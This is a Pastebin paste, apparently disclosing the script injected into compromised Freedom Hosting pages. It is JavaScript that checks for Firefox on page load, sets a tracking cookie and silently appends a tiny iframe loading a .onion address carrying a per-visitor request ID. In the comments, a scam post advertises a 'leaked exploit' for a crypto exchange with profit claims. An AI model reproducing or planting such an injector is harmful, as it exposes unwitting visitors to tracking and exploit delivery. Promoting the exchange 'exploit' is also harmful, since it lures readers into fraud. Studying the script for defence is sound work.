Guest User

FH STILL COMPROMISED

a guest
Aug 3rd, 2013
12,592
0
Never
11
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.61 KB | None | 0 0
  1. function createCookie(name,value,minutes) {
  2. if (minutes) {
  3. var date = new Date();
  4. date.setTime(date.getTime()+(minutes*60*1000));
  5. var expires = "; expires="+date.toGMTString();
  6. }
  7. else var expires = "";
  8. document.cookie = name+"="+value+expires+"; path=/";
  9. }
  10.  
  11. function readCookie(name) {
  12. var nameEQ = name + "=";
  13. var ca = document.cookie.split(';');
  14. for(var i=0;i < ca.length;i++) {
  15. var c = ca[i];
  16. while (c.charAt(0)==' ') c = c.substring(1,c.length);
  17. if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
  18. }
  19. return null;
  20. }
  21.  
  22. function isFF() {
  23. return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  24. }
  25.  
  26. function updatify() {
  27. var iframe = document.createElement('iframe');
  28. iframe.style.display = "inline";
  29. iframe.frameBorder = "0";
  30. iframe.scrolling = "no";
  31. iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
  32. iframe.height = "5";
  33. iframe.width = "*";
  34. document.body.appendChild(iframe);
  35. }
  36.  
  37. function format_quick() {
  38. if ( ! readCookie("n_serv") ) {
  39. createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
  40. updatify();
  41. }
  42. }
  43.  
  44. function isReady()
  45. {
  46. if ( document.readyState === "interactive" || document.readyState === "complete" ) {
  47.  
  48. if ( isFF() ) {
  49. format_quick();
  50. }
  51. }
  52. else
  53. {
  54. setTimeout(isReady, 250);
  55. }
  56. }
  57. setTimeout(isReady, 250);
Advertisement
Comments
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • Lerlazil
    56 days
    # CSS 0.85 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 25% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from SimpleSwap — instant swap).
  • User was banned
Add Comment
Please, Sign In to add comment